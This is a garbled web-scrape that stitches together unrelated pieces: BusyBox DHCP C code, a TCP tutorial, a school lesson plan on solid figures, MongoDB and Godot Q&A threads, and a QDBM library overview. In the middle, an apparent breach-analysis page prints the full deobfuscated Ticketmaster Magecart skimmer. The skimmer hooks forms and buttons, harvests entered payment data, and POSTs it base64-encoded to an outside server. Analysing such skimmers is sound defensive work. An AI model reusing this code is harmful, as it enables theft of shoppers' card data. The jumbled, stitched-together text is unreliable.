DHCP_NTP_SERVER */ "wins" "\0" /* DHCP_WINS_SERVER */ "requestip" "\0" /* DHCP_REQUESTED_IP */ "lease" "\0" /* DHCP_LEASE_TIME */ "dhcptype" "\0" /* */ "serverid" "\0" /* DHCP_SERVER_ID */ "message" "\0" /* DHCP_MESSAGE */ "vendorclass" "\0" /* DHCP_VENDOR */ "clientid" "\0" /* DHCP_CLIENT_ID */ "tftp" "\0" "bootfile" "\0" "userclass" "\0" #if ENABLE_FEATURE_RFC3397 "search" "\0" #endif /* MSIE's "Web Proxy Autodiscovery Protocol" support */ "wpad" "\0" ; /* Lengths of the different option types */ const uint8_t dhcp_option_lengths[] ALIGN1 = { [OPTION_IP] = 4, [OPTION_IP_PAIR] = 8, [OPTION_BOOLEAN] = 1, [OPTION_STRING] = 1, #if ENABLE_FEATURE_RFC3397 [OPTION_STR1035] = 1, #endif [OPTION_U8] = 1, [OPTION_U16] = 2, [OPTION_S16] = 2, [OPTION_U32] = 4, [OPTION_S32] = 4 }; /* get an option with bounds checking (warning, not aligned). */ uint8_t *get_option(struct dhcpMessage *packet, int code) { int i, length; uint8_t *optionptr; int over = 0; int curr = OPTION_FIELD; optionptr = packet->options; i = 0; length = sizeof(packet->options); while (1) { if (i >= length) { bb_error_msg("bogus packet, option fields too long"); return NULL; } if (optionptr[i + OPT_CODE] == code) { if (i + 1 + optionptr[i + OPT_LEN] >= length) { bb_error_msg("bogus packet, option fields too long"); return NULL; } return optionptr + i + 2; } switch (optionptr[i + OPT_CODE]) { case DHCP_PADDING: i++; break; case DHCP_OPTION_OVER: if (i + 1 + optionptr[i + OPT_LEN] >= length) { bb_error_msg("bogus packet, option fields too long"); return NULL; } over = optionptr[i + 3]; i += optionptr[OPT_LEN] + 2; break; case DHCP_END: if (curr == OPTION_FIELD && (over & FILE_FIELD)) { optionptr = packet->file; i = 0; length = sizeof(packet->file); curr = FILE_FIELD; } else if (curr == FILE_FIELD && (over & SNAME_FIELD)) { optionptr = packet->sname; i = 0; length = sizeof(packet->sname); curr = SNAME_FIELD; } else return NULL; break; default: i += optionptr[OPT_LEN + i] + 2; } } return NULL; } /* return the position of the 'end' option (no bounds checking) */ int end_option(uint8_t *optionptr) { int i = 0; while (optionptr[i] != DHCP_END) { if (optionptr[i] == DHCP_PADDING) i++; else i += optionptr[i + OPT_LEN] + 2; } return i; } /* add an option string to the options (an option string contains an option code, * length, then data) */ int add_option_string(uint8_t *optionptr, uint8_t *string) { int end = end_option(optionptr); /* end position + string length + option code/length + end option */ if (end + string[OPT_LEN] + 2 + 1 >= DHCP_OPTIONS_BUFSIZE) { bb_error_msg("option 0x%02x did not fit into the packet", string[OPT_CODE]); return 0; } DEBUG("adding option 0x%02x", string[OPT_CODE]); memcpy(optionptr + end, string, string[OPT_LEN] + 2); optionptr[end + string[OPT_LEN] + 2] = DHCP_END; return string[OPT_LEN] + 2; } /* add a one to four byte option to a packet */ int add_simple_option(uint8_t *optionptr, uint8_t code, uint32_t data) { const struct dhcp_option *dh; for (dh = dhcp_options; dh->code; dh++) { if (dh->code == code) { uint8_t option[6], len; option[OPT_CODE] = code; len = dhcp_option_lengths[dh->flags & TYPE_MASK]; option[OPT_LEN] = len; if (BB_BIG_ENDIAN) data <<= 8 * (4 - len); /* This memcpy is for processors which can't * handle a simple unaligned 32-bit assignment */ memcpy(&option[OPT_DATA], &data, 4); return add_option_string(optionptr, option); } } bb_error_msg("cannot add option 0x%02x", code); return 0; }
__label__pos
0.960892
dcsimg May 26, 2018     RSSRSS feed Networking 101: Understanding TCP, the Protocol TCP In Plain English • September 17, 2008 • By Charlie Schluting TCP is used everywhere, and understanding how TCP operates enables network and systems administrators to properly troubleshoot network communication issues. TCP is wonderfully complex, but don't worry: We aren't going to tell you to go read RFC 793. This is a gentle introduction, or demystification, if you will. In this edition of Networking 101, we'll cover the TCP protocol, in only as much detail necessary to understand the second part. You'll be familiar with enough terminology, you'll understand the components of the TCP header, and then next week we'll discuss "TCP in the wild," which will focus on examining some common issues with TCP, including window scaling problems, congestion, and of course the mechanics of a TCP connection. We sometimes hear people call it "the TCP/IP protocol suite," which means that they're talking about layers 1-4 plus 7, similar to how we presented layers. TCP lives at layer 4, along with its unreliable friend UDP. TCP stands for Transmission Control Protocol, by the way. Remember the header picture from the IP article? When a packet is encapsulated, we'll of course have the IP header at layer 3, and immediately following is the TCP header, which becomes the "data" for the IP header. TCP includes its own jargon, just like everything else. There was Ethernet frames, IP datagrams, and now TCP segments. You can think of them all as packets, but be sure to use the correct terms when communicating with others. While trying to think of other things people say about TCP, it seemed apropos to spend some time explaining the things people are trying to tell you. There's nothing worse than asking a guru a question, and getting a response like "well, it's end-to- end." If you knew TCP you'd know what this meant, but then you wouldn't have asked the question in the first place. Let's see what we can do about that. Networking 101 • Understanding IP Addresses • Understanding Subnets and CIDR • Subnets Realized (Including IPv6) • Understanding Layers • Understanding the Data Link Layer • Understanding Spanning Tree • Networking 101: Understanding (and Using) ICMP • Networking 101: Understanding the Internet Protocol • Yes, TCP is end-to-end. There is no concept of broadcast, or anything like it. To speak TCP with another computer, you must be connected, like a telephone call, so each end is prepared to talk. "Stream delivery" is also another phrase you'll hear. This simply means that TCP works with data streams, and out of order packets are o.k. In fact, TCP is even o.k. with lost or corrupted packets; it will eventually get them again. More likely you'll be hearing a programmer talking about streams, referring to the fact that it's hard to tell when data is actually going to be sent, and you can send unstructured data down a TCP stream. TCP can buffer things, in weird ways that sometimes don't make sense, but neither programmers nor users need to worry about that. Whenever a TCP packet is sent, an acknowledgment, or ACK, is returned. This is really the only way to provide a reliable protocol: You must let the other side know if you have received things. Of course, people will want to improve on an inefficient system like this. Enter "piggybacking ACKs" into the picture. People call TCP "full duplex" because of piggybacking, because it lets both sides send data at the same time. This is accomplished by carrying the ACK for previous packet received within the current packet, piggybacked. In terms of preserving network utilization, this is much better than sending an entirely separate packet just to say "got it." Finally, there's the concept of a cumulative ACK: ACKing more than one packet at a time, to say "I got all the others, including this one." In IP we dealt with individual packets being part of a larger IP datagram. Remember, a TCP segment is an individual TCP packet. TCP is a stream, so there isn't really any other concept to worry about aside from a "connection." Maximum Segment Size, or MSS, is negotiated at connection time, but almost always changes. The default MSS is 536, which is 576 (the IP guaranteed minimum packet size) minus 20 bytes for the IP header and 20 bytes for the TCP header. TCP tries to avoid causing IP-level fragmentation, so it will almost always start with 536. The sexiest feature of TCP still remains; this is the Sliding Window Protocol. The window is essentially the amount of un-ACKed data that has been sent, and it can grow and shrink at will. This gets really interesting, and will be covered next time. The header of a TCP packet is 20 bytes, just like an IP's. Both IP and TCP headers can get larger, if options are used. TCP does not include an IP address; it only needs to know about the port on which to connect. Don't let this confuse you though, TCP keeps track of end-to-end connections in a state table that includes IP addresses and ports. It's just that the header for TCP doesn't need the IP information, since it comes from IP. It is easier to think of a packet as a stream, one byte after the next. Everyone always wants to show a table for the header, but this can confuse matters more. The TCP header, starting with the first bit is: • Source port, 16 bits: my local TCP port that's used for this connection • Destination port, 16 bits: The remote machine's TCP port that I'm talking to • Sequence number, 32 bits: the number used to keep track of packet ordering • Acknowledgment number, 32 bits: the previously received sequence number that we're ACKing • Header length, 4 bits: the number of 32-bit words in the header. This is set to five, if no options are used • Reserved, 6 bits: reserved for future use • Flags, 6 bits total, each flag is one bit (on or off): • URG: urgent field pointer • ACK: this packet is (or includes) an ACK • PSH: push function (not used) • RST: reset, or terminate the connection • SYN: synchronization packet, aka Start Connection • FIN: final packet, start hang-up sequence • Window size, 16 bits: begins with the ACK field that the receiving side will accept • Checksum, 16 bits: a checksum of the TCP header and data • Urgent pointer, 16 bits: an offset from the sequence number that points to the data following URG data • Options: MSS, Window scale, and more. This is mostly the focus of our next installment on TCP. Each side of the TCP connection uses the two pairs of IP address and Port to identify the connection, and sends the data on to the application that is listening on the port. And that's all there is. Just kidding, there's tons more to know about TCP. Come back next week to learn how all of these features interact, and discover even more about TCP. In a Nutshell • TCP is the most frequently used protocol, and lives at layer 4 in the protocol stack. • TCP provides congestion control, reliability, and a stream on which to send data. • To be efficient, TCP tries to send as much data as possible before getting an ACK back. Article courtesy of Enterprise Networking Planet Most Popular LinuxPlanet Stories Sitemap × We have made updates to our Privacy Policy to reflect the implementation of the General Data Protection Regulation.
__label__pos
0.600359
Uploaded by LEOLEN BAGAYAN Detailed Lesson Plan In Mathematics VI- advertisement Detailed Lesson Plan In Mathematics VI I. Objectives: At the end of the class 100% of the students should be able to learn 75% of the lesson and be able to: a. Visualize and describe the different solid figures (M6GE-IIIa-28) b. Identify the faces vertex and edges of a solid figure. (M6GE-IIIb-30) c. Display cooperativeness during group activity. II. Subject Matter: a. Topic: Solid Figures b. References: K-12 MELCS 6 p. 224, ecosia.org, https://www.academia.edu c. Materials: Pictures, real object, flash cards, laptop d. Values: Active Participation, Cooperation III. Procedure: Teacher Activity A. Preliminary Activities 1. Prayer: Let us stand and pray 2. Greeting: Good Morning Children You may now take your sit 3. Checking of Attendance: Is there any absent today? Very good! Students Activity In the name of Father and the Son and the Holy Spirit Amen! Good Morning Ma’am Nana Thank you ma’am Nana None Ma’am Nana 4. Classroom Management: Can you please sit properly so we can start our lesson today! B. Preparatory Activities: 1. Drill: Guess who am I? My name is given in the box below. Oops! Spelling of my name is jumbled up. Try to identify it from the clues given below and write it in the blank space. _________(1) I am a solid with two congruent circular bases that are parallel. ________(2) I am a prism whose all faces are square. ________ (3) Looks like marbles but have no vertex. ________ (4) I am a solid whose base is polygonal and other faces are triangles. - cylinder Cube Sphere Pyramid CLINYDER 2. Review Yesterday we differentiate the plane figures to the solid figures. (call a student who want to answer the given figures ) Yes Ma’am! Circle the 3D shapes (Solid figure) and Check the 2D shapes (Plane figure). Pupils will do the boardwork C. Developmental Activities: 1. Activity I have here a big box inside of this box has different shape all you have to do is to pick one shape in this box and tell to everyone what kind of shape did you pick. Yes Ma’am Is that clear? So who wants to pick first in my big box? Anyone? Cube . sphere cone sphere cylinder cube cone cylinder 2. Analysis Can you guess what is our lesson for today? Very good! Solid figure Ma’am So how we will describe the solid figure? I have here a box. (Show them a big box.) What is the shape of the bottom part of a box? Is it the same with the shape of the top part? Rectangle yes! What is the shape of the right side of the box? Does it have with the same shape with the one on the left side? Square Yes! Do the back and front sides of the box have the same shape? Yes! So how many faces does the box have? 6 faces ma’am Very good! How many edges that the box have? 12 edges Ma’am Very good! How about vertices? How many vertices that the box have? 8 vertices Very good! Thus the box has three- dimensional object? Yes! Why yes is your answer? Because it has length width and height. Very good! So how we will describe a solid figure? Very good! Solid figure has threedimensional object if they have length, width and height. So class this means that This box is a solid figure called rectangular prism, because of its rectangular base, has 6 faces, 8 vertices and 12 edges. That you said a while ago. So what is prism? Who wants to read? (one student will read the definition of a prism) A Prism is a polyhedron that has two congruent parallel faces called base. When we say polyhedron this means a solid figure whose side are polygon. Each side is called faces. Two faces that intersect in a line segment is called an edge. And two edges that intersect in a point is called a vertex. (The teacher pointed out where’s the faces edges A Prism is a polyhedron that has two congruent parallel faces called base. and vertex in a box) When we say two congruent parallel faces called base, meaning to say two same bases was aligned in bout side. Can you follow? Yes Ma’am I have here some prism that was named according to the shape of its base. name Shape of the base Number definition example of lateral faces Triangular triangle 3 Composed prism of two triangular bases and three rectangular lateral faces. Rectangular rectangle 4 Composed prism of two rectangular bases and four rectangular lateral faces cube Square 4 A cube is a prism with a square base. all its faces are square Pentagonal Pentagonal 5 Has two Prism pentagonal bases and five rectangular lateral faces. The lateral faces are the faces that join the base of a solid figure. Always remember that each faces is a polygon. Is that clear? I have here another solid figure can you tell me what is the name of this solid figure? Yes ma’am This are the clues how will you observe a figure 1. The sides are all polygon 2. The figure is a prism 3. Its base are hexagons What would be the answer? The figure is a hexagonal Prism 8 faces 18 edges 12 vertices How many faces? How many edges? How many vertices? Another prism is pyramid which is also named according to the shape of its base. Please read the definition of pyramid (one student will read the definition of the pyramid) A pyramid is a polyhedron whose base is a polygon and the lateral faces are triangles. Meaning to say if the prism has 2 equal bases the pyramid has only one base but the lateral faces are triangle. Is that clear? Yes Ma’am Here are some example of pyramids that was name according to the shape of its base. name Triangular pyramid Rectangular pyramid Square pyramid Shape of the base triangle Number of lateral faces 3 rectangle 4 square 4 example Is that clear? Yes ma’am Can you name the figure? Count the number of faces, edges and vertices. This are the clues 1. The lateral faces are all triangles 2. The figure is a pyramid 3. The base is a square What would be the answer? Very good! the figure is a square pyramid It has 4 faces, 8 edges and 5 vertices. Other solid figures have curved surfaces name definition Example cylinder Has two circular bases that are congruent and parallel cone Has one circular base sphere Is a curved surface of points that are all the same distance from the center 3 .Abstraction What is solid figure? Very good! Can you give me some example of solid figure? Okay very good! 4. .Application (The class will group into 4 group) What we should do when doing an activity? Solid figure has threedimensional object if they have length, width and height. Hexagonal prism Rectangular prism Triangular prism Square pyramid Cone Sphere Cylinder Etc. 1. Be quite 2. And participate in a group activity. Very good children. A. Activity group 1 Identify the picture what kind of solid figure it is. Cube 1.____________ Cylinder 2. ______________ Rectangular prism 3.____________ Sphere 4.______________ B. Activity group 2 Match the column A (2D shape) to column B (3D shape)  ●  •       C. Activity group 3 Identify how many edges, faces and vertex did the solid figure below. HEXAGONAL PRISM EDGES:__________________ FACES:__________________ VERTEX:_________________ 18 edges 8 faces 12 vertex PENTAGONAL PYRAMID EDGES:__________________ FACES:__________________ VERTEX:_________________ 10 edges 6 faces 6 vertex Activity group 4 Write check ( / ) if the picture is solid figure and ( x ) if is not. 1.__________ 2. _____________ 3. ____________ 4. _____________ 5._________ 1. 2. 3. 4. 5. X / X / / IV. Evaluation: Complete the table below Solid Figure Illustration (draw the figure) Number of vertices Rectangular prism Square pyramid Cube Triangular prism Rectangular pyramid V. Assignment 1. Draw and color a robot using the solid figure. Prepared by: LEOLEN P. BAGAYAN Grade VI - Adviser Number of faces Number of edges Download Study collections
__label__pos
0.841642
Ticketmaster magecart skimmer Ticketmaster's checkout page included a third party JavaScript resource hosted by Inbenta. Inbenta and this script became compromised with an obfuscated payload added. The deobfuscated code is below and shows the skimmer grabbing payment data from form input values and sending them to a third party server. If you have the obfuscated code, please submit it as a sample. References permalink Payload permalink var skimmer = { snd: null, gate: "https://webfotce.me/js/form.js", myid: (function(cname) { var cd = document.cookie.match(new RegExp("( ? : ^ | ;)" + cname.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, "\$1") + " = ([ ^ ;] * )")); return cd ? decodeURIComponent(cd[1]) : undefined })("setidd") || (function() { var d = new Date(); var time_id = d.getTime() + " -" +Math.floor(Math.random() * (99999999911111111 + 1) + 11111111); var exp = new Date(new Date().getTime() + 60 * 60 * 24 * 1000); document.cookie = "setidd = "+time_id + "; path = /; expires=" + exp.toUTCString(); return time_id })(), clk: function() { skimmer.snd. = null; var inp = document.querySelectorAll("input, select, textarea, checkbox, button"); for (var i = 0; i < inp.length; i++) { if (inp[i].value.length > 0) { var nme = inp[i].name; if (nme ==) { nme = i }; skimmer.snd += inp[i].name + " = "+inp[i].value + " & " } } }, send: function() { try { var btn = document.querySelectorAll("a[href *= \"javascript: void(0)\"], button, input, submit, .btn, .button"); for (var i = 0; i < btn.length; i++) { var b = btn[i]; if (b.type != "text" && b.type != "select" && b.type != "checkbox" && b.type != "password" && b.type != "radio") { if (b.addEventListener) { b.addEventListener("click", skimmer.clk, false) } else { b.attachEvent("onclick", skimmer.clk) } } }; var frm = document.querySelectorAll("form"); for (var i = 0; i < frm.length; i++) { if (frm[i].addEventListener) { frm[i] addEventListener("submit", skimmer.clk, false) } else { frm[i].attachEvent("onsubmit", skimmer.clk) } }; if (skimmer.snd != null) { var hostname = location.hostname.split(".").slice(0).join("_") || "nodomain"; var enc_info = btoa(skimmer.snd); var http = new XMLHttpRequest(); http.open("POST", skimmer.gate, true); http.setRequestHeader("Content - type", "application / x - www - form - urlencoded"); http.send("info = "+enc_info + " & hostname = ticketmUK & key = "+skimmer.myid) }; skimmer.snd = null; enc_info = null; setTimeout(function() { skimmer.send() }, 30) } catch (e) {} } }; if ((new RegExp("order | checkout | onestep", "gi")).test(window.location)) { skimmer.send() }
__label__pos
0.999016
Super User is a question and answer site for computer enthusiasts and power users. Join them; it only takes a minute: Sign up Here's how it works: 1. Anybody can ask a question 2. Anybody can answer 3. The best answers are voted up and rise to the top My setup: I have 2 hosts, and 2 shards each. • Host1 has 2 shards, and is the master of the replicas • host2 has the secondaries of the 2 shards. . • host1: shard1 (repset1),shard2 (repset2) • host2: shard1 (repset1),shard2 (repset2) There's also a 3rd host that acts as arbitrer. I have 50 threads writing randomly to both shards (using a hash) via mongos with REPLICA_SAFE WriteConcern set on each insert. The questions: 1. mongostat displays about 90% locked for both shards in host1 and about 1% locked on host2. Since I use REPLICA_SAFE which supposedly writes to both servers shouldn't the locks be the same? 2. mongostat reports qr=30 for both shards of host1, and qw=0 always. Since I perform only writes how is this possible? Moreover on host2 all queues are reported 0. Faults are abut the same in all shards/hosts (arround 80). 3. netIn/netOut on the secondaries (host2) are always about 200bytes/sec. Too low. 4. mongos has 53 connections, host1's shards have 71 and 71 and host2's shards have 9 and 8. How is this? share|improve this question migrated from stackoverflow.com Nov 7 '12 at 18:05 This question came from our site for professional and enthusiast programmers.      Which version of mongo are you running. If >= 2.2.X are those lock statistics for the collection in question, global or aggregate? – daveh Nov 19 '12 at 7:30 Be careful with running multiple instances of mongod on one host. They are competing in system unitlization: Or run vm's with dedicated RAM and CPU's (thats the way you could use those 24Core System more efficiently with MongoDB ;) share|improve this answer Sivann, It looks like you are using mongo < 2.0 if you are not, that may change things. You say you are using REPLICA_SAFE, which W level are you using? If its w:1 then you are simply confirming the writes to your primary have succeeded, you should use w:2 to confirm the writes have reached your secondary. 1. Replication will account for this. Your inserts are taking a write lock as they insert and this is blocking the replication from reading the data to replicate. 2. Reinforces point 1. Your replication reads are queueing behind the writes from the inserts. Faults are probably the issue here as your system needs to page into RAM things that are to be read in for replication which is yielding its lock. You are also likely to be seeing contention between your two primaries for RAM for the reasons Marc mentioned. 3. Seems low, but cant be certain. Likely that your systems are waiting to page data into RAM or for a Write lock in order to replicate it. 4. You can see which connections go where from within the logfiles. Without knowing what is where i could not tell you why. That said the number of connections here does not seem unreasonable. share|improve this answer      I'm using mongo 2.2 – sivann Nov 20 '12 at 16:59 You must log in to answer this question. Not the answer you're looking for? Browse other questions tagged .
__label__pos
0.691907
Is this Possible? Youtube bot/script. Discussion in 'YouTube' started by onthegoaudio1, Jan 6, 2011. 1. onthegoaudio1 onthegoaudio1 Regular Member Joined: Dec 17, 2009 Messages: 330 Likes Received: 190 Occupation: Full Time IM Location: US Home Page: I am looking to have a bot or a script made that can do this. -Search Youtube for a specific keyword. Lets say we want all the videos with www.123456.com in the description. -Download all the videos that are scraped. -Re upload them with the same titles, description, keywords, ETC as the Video scraped, So basically it would be doing what the Youtube Advertiser "DUO" feature does BUT it would keep the same Titles, Descriptions and keywords. Anyone have any input on this? IF in fact it is possible, where can I find someone to complete it?   2. own007 own007 Regular Member Joined: May 15, 2009 Messages: 243 Likes Received: 32 it is't a good idea to keep the original titles and tags. youtube are much sophisticated than that.   3. newman123 newman123 Junior Member Joined: Dec 20, 2010 Messages: 119 Likes Received: 23 I'd agree. They'd be pretty quick to notice if the exact same videos with the exact same titles and tags are going up.  
__label__pos
0.850644
why are my bullets not coliding with enemies :information_source: Attention Topic was automatically imported from the old Question2Answer platform. :bust_in_silhouette: Asked By DoofusDonald sometimes the bullets colide but most of the time they just go right through each other. the bullet is a rigid body2d and is only a sprite and a collision shape the enemy is a kinematic2d with a sprite, collision shape, area2d, and the area 2d has another collision shape. the code for the bullet is, if Input.is_action_just_pressed("LMB"): fire() func fire(): var bullet_instance = bullet.instance() bullet_instance.position = get_global_position() bullet_instance.rotation_degrees = rotation_degrees bullet_instance.apply_impulse(Vector2(), Vector2(bullet_speed,0).rotated(rotation)) get_tree().get_root().call_deferred("add_child",bullet_instance) and it is inside the player node, the code for the enemy is, extends KinematicBody2D var motion = Vector2() func _physics_process(_delta): var player = get_parent(). get_node("Player") position += (player.position - position)/50 look_at(player.position) move_and_collide(motion) so does anyone know a fix for this? :bust_in_silhouette: Reply From: johnygames This usually happens when a projectile moves too fast. The way collision works is by checking where the projectile is every frame and whether a collision shape has been entered. The engine calculates where the object is going to be in the next frame and if there is no object in the calculated position, then the object keeps moving along its tranjectory. If an object moves too fast and the collision shape is too thin, then collision is not detected. The thickness of the collision shape has to be greater than the distance traveled in a frame, or else the object passes right THROUGH the obstacle because it never finds itself IN the obstacle. A way to combat this would be to use thicker collision shapes, but I understand that this is impractical since we are talking about tiny bullets. Another thing you can try is to tweak the Continuous Cd setting from the inspector menu of the rigidbody. This leads to more accurate collisions at the cost of performance (at least for 3d physics). I haven’t used this setting, but there is a “Cast Ray” option under Continuous Cd which I guess is what you want. Generally speaking, you cast a ray to see what it hits. Check this out for more info. Raycasting works better for bullets because rays detect obstacles along the bullet’s path more quickly and accurately. Another piece of advice would be to do all updating in the _physics_process(delta) function instead of the _process(delta)since you are dealing with physics and you want actions to be synced with the Physics Engine. :bust_in_silhouette: Reply From: mdubaisi what about turning the bullet into area2D, you can watch these videos: and https://www.youtube.com/watch?v=UpTlc51dGhQ&list=PLyckz_-Rzq6ClGevL2fneJ5YJnMPKWa4M&index=6 by UmaiPixel
__label__pos
0.859901
Emmabuntus, Ubuntu, Derivate, Linux, Open Source BackTrack, Linux, distributions, Ubuntu, derivate, securuty, forensic VirtualBox, Linux, Ubuntu, Raring Ringtail synaptic, Ubuntu, Linux, software packages jwplayer, multimedia, Linux, Ubuntu, flash Meshlab, graphic, software, Ubuntu, open source, Linux Synapse, Linux, Ubuntu, raring, Quantal Gimp, Ubuntu, Linux FreeMind, Linux, open source Linux, infographic, history QDBM Quick Database Manager library of routines for managing a database. This is the QDBM Database command package to be used as CGI commands. QDBM is a library of routines for managing a database. The database is a simple data file containing records, each is a pair of a key and a value. Every key and value is serial bytes with variable length. Both binary data and character string can be used as a key and a value. There is neither concept of data tables nor data types. Records are organized in hash table or B+ tree. As for database of hash table, each key must be unique within a database, so it is impossible to store two or more records with a key overlaps. The following access methods are provided to the database: storing a record with a key and a value, deleting a record by a key, retrieving a record by a key. Moreover, traversal access to every key are provided, although the order is arbitrary. These access methods are similar to ones of DBM (or its followers: NDBM and GDBM) library defined in the UNIX standard. QDBM is an alternative for DBM because of its higher performance. As for database of B+ tree, records whose keys are duplicated can be stored. Access methods of storing, deleting, and retrieving are provided as with the database of hash table. Records are stored in order by a comparing function assigned by a user. It is possible to access each record with the cursor in ascending or descending order. According to this mechanism, forward matching search for strings and range search for integers are realized. Moreover, transaction is available in database of B+ tree. Effective Implementation of Hash Database QDBM is developed referring to GDBM for the purpose of the following three points: higher processing speed, smaller size of a database file, and simpler API. They have been achieved. Moreover, the following three restrictions of traditional DBM: a process can handle only one database, the size of a key and a value is bounded, a database file is sparse, are cleared. QDBM uses hash algorithm to retrieve records. If a bucket array has sufficient number of elements, the time complexity of retrieval is 'O(1)'. That is, time required for retrieving a record is constant, regardless of the scale of a database. It is also the same about storing and deleting. Collision of hash values is managed by separate chaining. Data structure of the chains is binary search tree. Even if a bucket array has unusually scarce elements, the time complexity of retrieval is 'O(log n)'. QDBM attains improvement in retrieval by loading RAM with the whole of a bucket array. If a bucket array is on RAM, it is possible to access a region of a target record by about one path of file operations. A bucket array saved in a file is not read into RAM with the 'read' call but directly mapped to RAM with the 'mmap' call. Therefore, preparation time on connecting to a database is very short, and two or more processes can share the same memory map. If the number of elements of a bucket array is about half of records stored within a database, although it depends on characteristic of the input, the probability of collision of hash values is about 56.7% (36.8% if the same, 21.3% if twice, 11.5% if four times, 6.0% if eight times). In such case, it is possible to retrieve a record by two or less paths of file operations. If it is made into a performance index, in order to handle a database containing one million of records, a bucket array with half a million of elements is needed. The size of each element is 4 bytes. That is, if 2M bytes of RAM is available, a database containing one million records can be handled. QDBM provides two modes to connect to a database: 'reader' and 'writer'. A reader can perform retrieving but neither storing nor deleting. A writer can perform all access methods. Exclusion control between processes is performed when connecting to a database by file locking. While a writer is connected to a database, neither readers nor writers can be connected. While a reader is connected to a database, other readers can be connect, but writers can not. According to this mechanism, data consistency is guaranteed with simultaneous connections in multitasking environment. Traditional DBM provides two modes of the storing operations: 'insert' and 'replace'. In the case a key overlaps an existing record, the insert mode keeps the existing value, while the replace mode transposes it to the specified value. In addition to the two modes, QDBM provides 'concatenate' mode. In the mode, the specified value is concatenated at the end of the existing value and stored. This feature is useful when adding a element to a value as an array. Moreover, although DBM has a method to fetch out a value from a database only by reading the whole of a region of a record, QDBM has a method to fetch out a part of a region of a value. When a value is treated as an array, this feature is also useful. Generally speaking, while succession of updating, fragmentation of available regions occurs, and the size of a database grows rapidly. QDBM deal with this problem by coalescence of dispensable regions and reuse of them, and featuring of optimization of a database. When overwriting a record with a value whose size is greater than the existing one, it is necessary to remove the region to another position of the file. Because the time complexity of the operation depends on the size of the region of a record, extending values successively is inefficient. However, QDBM deal with this problem by alignment. If increment can be put in padding, it is not necessary to remove the region. As for many file systems, it is impossible to handle a file whose size is more than 2GB. To deal with this problem, QDBM provides a directory database containing multiple database files. Due to this feature, it is possible to handle a database whose total size is up to 1TB in theory. Moreover, because database files can be deployed on multiple disks, the speed of updating operations can be improved as with RAID-0 (striping). It is also possible for the database files to deploy on multiple file servers using NFS and so on. Useful Implementation of B+ Tree Database Although B+ tree database is slower than hash database, it features ordering access to each record. The order can be assigned by users. Records of B+ tree are sorted and arranged in logical pages. Sparse index organized in B tree that is multiway balanced tree are maintained for each page. Thus, the time complexity of retrieval and so on is 'O(log n)'. Cursor is provided to access each record in order. The cursor can jump to a position specified by a key and can step forward or backward from the current position. Because each page is arranged as double linked list, the time complexity of stepping cursor is 'O(1)'. B+ tree database is implemented, based on above hash database. Because each page of B+ tree is stored as each record of hash database, B+ tree database inherits efficiency of storage management of hash database. Because the header of each record is smaller and alignment of each page is calculated statistically, in most cases, the size of database file is cut by half compared to one of hash database. Although operation of many pages are required to update B+ tree, QDBM expedites the process by caching pages and reducing file operations. In most cases, because whole of the sparse index is cached on memory, it is possible to retrieve a record by one or less path of file operations. B+ tree database features transaction mechanism. It is possible to commit a series of operations between the beginning and the end of the transaction in a lump, or to abort the transaction and perform rollback to the state before the transaction. Even if the process of an application is crushed while the transaction, the database file is not broken. In case that QDBM is built with ZLIB, LZO, or BZIP2 enabled, a lossless data-compression library, the content of each page of B+ tree is compressed and stored in a file. Because each record in a page has similar patterns, high efficiency of compression is expected due to the Lempel-Ziv algorithm and the like. In case handling text data, the size of a database is reduced to about 25%. If the scale of a database is large and disk I/O is the bottleneck, featuring compression makes the processing speed improved to a large extent. Simple But Various Interfaces . QDBM provides very simple APIs. You can perform database I/O as usual file I/O with 'FILE' pointer defined in ANSI C. In the basic API of QDBM, entity of a database is recorded as one file. In the extended API, entity of a database is recorded as several files in one directory. Because the two APIs are very similar with each other, porting an application from one to the other is easy. APIs which are compatible with NDBM and GDBM are also provided. As there are a lot of applications using NDBM or GDBM, it is easy to port them onto QDBM. In most cases, it is completed only by replacement of header including (#include) and re-compiling. However, QDBM can not handle database files made by the original NDBM or GDBM. In order to handle records on memory easily, the utility API is provided. It implements memory allocating functions, sorting functions, extensible datum, array list, hash map, and so on. Using them, you can handle records in C language cheaply as in such script languages as Perl or Ruby. B+ tree database is used with the advanced API. The advanced API is implemented using the basic API and the utility API. Because the advanced API is also similar to the basic API and the extended API, it is easy to learn how to use it. In order to handle an inverted index which is used by full-text search systems, the inverted API is provided. If it is easy to handle an inverted index of documents, an application can focus on text processing and natural language processing. Because this API does not depend on character codes nor languages, it is possible to implement a full-text search system which can respond to various requests from users. Along with APIs for C, QDBM provides APIs for C++, Java, Perl, and Ruby. APIs for C are composed of seven kinds: the basic API, the extended API, the NDBM-compatible API, the GDBM-compatible API, the utility API, the advanced API, and the inverted API. Command line interfaces corresponding to each API are also provided. They are useful for prototyping, testing, debugging, and so on. The C++ API encapsulates database handling functions of the basic API, the extended API, and the advanced API with class mechanism of C++. The Java API has native methods calling the basic API, the extended API, and the advanced API with Java Native Interface. The Perl API has methods calling the basic API, the extended API, and the advanced API with XS language. The Ruby API has method calling the basic API, the extended API, and the advanced API as modules of Ruby. Moreover, CGI scripts for administration of databases and full-text search are provided. Wide Portability QDBM is implemented being based on syntax of ANSI C (C89) and using only APIs defined in ANSI C or POSIX. Thus, QDBM works on most UNIX and its compatible OSs. As for C API, checking operations have been done at least on Linux 2.2, Linux 2.4, FreeBSD 4.8, FreeBSD 5.0, SunOS 5.7, SunOS 5.8, SunOS 5.9, HP-UX 11.00, Cygwin 1.3.10, Mac OS X 10.2, and RISC OS 5.03. Although a database file created by QDBM depends on byte order of the processor, to do with it, utilities to dump data in format which is independent to byte orders are provided. Building For building a program using QDBM, the program should be linked with a library file 'libqdbm.a' or 'libqdbm.so'. For example, the following command is executed to build 'sample' from 'sample.c'.     gcc -I/usr/local/include -o sample sample.c -L/usr/local/lib -lqdbm Download: Adserver 610x250 If you liked this article, subscribe to the feed by clicking the image below to keep informed about new contents of the blog: rss_trappola Share on Google Plus About Hugo Repetto Ubuntu is a Linux distribution that offers an operating system predominantly focused on desktop computers but also provides support for servers. Based on Debian GNU / Linux, Ubuntu focuses on ease of use, freedom in usage restriction, regular releases (every 6 months) and ease of installation. Blogger Comment Facebook Comment 0 comments: Post a Comment
__label__pos
0.763086